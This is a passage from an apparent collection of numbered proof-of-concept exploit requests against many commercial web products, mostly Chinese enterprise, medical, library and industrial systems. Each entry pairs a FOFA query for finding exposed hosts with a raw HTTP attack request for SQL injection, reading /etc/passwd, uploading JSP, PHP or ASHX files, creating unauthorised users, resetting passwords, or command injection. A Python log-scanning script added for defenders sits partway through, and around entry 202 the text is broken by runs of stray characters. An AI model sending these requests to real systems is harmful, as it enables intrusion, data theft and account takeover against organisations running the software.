12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')


185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450


187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1


188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Send the POC request to obtain the CSRF token, then obtain a cookie, then upload and request the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returns: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returns:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
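Added example for defenders, not part of the original post: the entries above (186 to 201) share a handful of request patterns (time-based SQL injection via SLEEP, WAITFOR DELAY and RANDOMBLOB, union probes, file:// and /etc/passwd reads, and upload filenames with traversal or script extensions), and this Python script flags them in a web access log for risk triage. The log lines and rule names are constructed here and assume a simple "client "request line" status [body excerpt]" format.

```python
"""Added example, not from the original post: flag the request patterns of
entries 186-201 in a web access log. All log lines are constructed."""
import re
from urllib.parse import unquote_plus

# rule name -> regex applied to the URL-decoded, lower-cased request text
RULES = {
    # time-based SQLi: MySQL SLEEP(), MSSQL WAITFOR DELAY, SQLite RANDOMBLOB()
    "time_based_sqli": re.compile(r"sleep\s*\(|waitfor\s+delay|randomblob\s*\("),
    # union-based probe as in entry 197
    "union_sqli": re.compile(r"union\s+(all\s+)?select"),
    # local file read via file:// or a direct /etc/passwd path (entries 188, 190)
    "file_read": re.compile(r"file://|/etc/passwd"),
    # path traversal inside an uploaded filename (entry 194)
    "upload_traversal": re.compile(r'filename="[^"]*\.\./'),
    # server-side script extension in an uploaded filename (entries 192, 194, 203)
    "script_upload": re.compile(r'filename="[^"]*\.(jsp|php|ashx)"'),
}


def decode(raw: str) -> str:
    """Decode twice so double-encoded payloads (%2527 -> %27 -> ') are caught."""
    return unquote_plus(unquote_plus(raw)).lower()


def classify(request: str) -> list[str]:
    """Names of every rule matched by one logged request (path plus body excerpt)."""
    text = decode(request)
    return [name for name, rx in RULES.items() if rx.search(text)]


def scan_access_log(lines: list[str]) -> list[tuple[int, list[str]]]:
    """(1-based line number, matched rules) for each suspicious log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        rules = classify(line)
        if rules:
            hits.append((n, rules))
    return hits


# Constructed log lines: client "METHOD PATH PROTO" status [body excerpt]
SAMPLE_LOG = [
    '10.0.0.5 "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200',
    '10.0.0.5 "GET /attachment?file=/etc/passwd HTTP/1.1" 200',
    '10.0.0.6 "POST /index.php/admin/Userinfo/poihuoqu HTTP/2" 200 poi=file:///etc/passwd',
    '10.0.0.7 "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200',
    '10.0.0.8 "POST /servlet/uploadAttachmentServlet HTTP/1.1" 200 filename="../../../../../jboss/web/fe.war/hello.jsp"',
    '10.0.0.9 "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111-- HTTP/1.1" 200',
    '10.0.0.10 "GET /index.html HTTP/1.1" 200',
]

if __name__ == "__main__":
    for n, rules in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {', '.join(rules)}")
```

A hit on a real log is a trigger to check the target product's version against the entry above and to look for the follow-up request (for example the uploaded file path), not proof of compromise by itself.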

3 {6 }- R# E' o. `* ?! v
6 V  q- j, W! Q9 ^202. 微擎系统 AccountEdit任意文件上传
$ P2 x/ w- Y3 S) k9 c/ F, H. Z9 NFOFA:body="/Widgets/WidgetCollection/"
* x1 C& |) J' z获取__VIEWSTATE和__EVENTVALIDATION值
0 }4 m0 t, ]4 s( T& U6 BGET /User/AccountEdit.aspx HTTP/1.1# |( i- q- j; K2 n1 D7 \; k
Host: 滑板人之家$ b4 n( E$ ]( P0 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31/ \& o& V) B* O  U, Y. b0 a' e+ W
Content-Length: 08 q8 a: N6 [, \& L
1 c9 U, u4 `; \" Z
( f) F2 _) j2 \9 `" ^
替换__VIEWSTATE和__EVENTVALIDATION值
% n& A4 `0 g  r# J7 S" o1 w% rPOST /User/AccountEdit.aspx HTTP/1.1  X3 ?) U( a4 ~; r
Accept-Encoding: gzip, deflate, br* N4 `! o4 C! i6 F
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
6 G) m/ g) ^# Q
, r6 _( p2 E0 s0 m7 f/ u- J-----------------------------786435874t38587593865736587346567358735687" _6 n7 ?* L0 X
Content-Disposition: form-data; name="__VIEWSTATE"
; m" T6 E  A/ w: N+ i* E" |; B/ _+ W4 u0 r# G( D! r; P
__VIEWSTATE/ t' Q  {) A4 x4 B6 ]/ N1 P
-----------------------------786435874t38587593865736587346567358735687
% B$ y, A6 w# l: Z5 [  NContent-Disposition: form-data; name="__EVENTVALIDATION"
4 s: F( I/ h7 K8 ^! {1 o; e: O- ^
__EVENTVALIDATION
3 T" P5 T7 ~3 E! T-----------------------------786435874t38587593865736587346567358735687
. F8 {" O( a8 d6 oContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
# i7 I6 ~2 w# }# c) }9 ]Content-Type: text/plain
! E. t) D* M1 s% [. i# I- b
& o; `0 H9 N4 z. J4 [6 x) ?Hello World!
( i7 d& S% |9 U+ p  t-----------------------------786435874t38587593865736587346567358735687- F; z1 D* h* Q) y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
% \1 W# p, Y4 B* q" k2 L+ r. a+ E7 B( u5 r& E* U
上传图片9 g& @6 I: T) r& S8 S
-----------------------------786435874t38587593865736587346567358735687
! a; s+ f2 a# B+ A9 yContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"/ `7 d% d8 h4 ?! |, r) |( B

& D  u7 w' t- T2 l+ p  ]
* W7 i& ?5 x# R! Q0 w; s-----------------------------786435874t38587593865736587346567358735687
. ]  i$ r2 A/ v; u' G3 LContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
, ^7 x1 n, [) F6 N
. K3 Y- c# E% n7 Z
6 A# g0 w% E9 \-----------------------------786435874t38587593865736587346567358735687--
9 h2 n4 [& ?/ M# b/ i' J% K3 H% Y! c1 u, M- Z
& J0 W- U1 e( f8 h
/_data/Uploads/1123.txt
9 n4 l! Y: V9 {1 E8 }8 N! B* X  ?2 t
203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--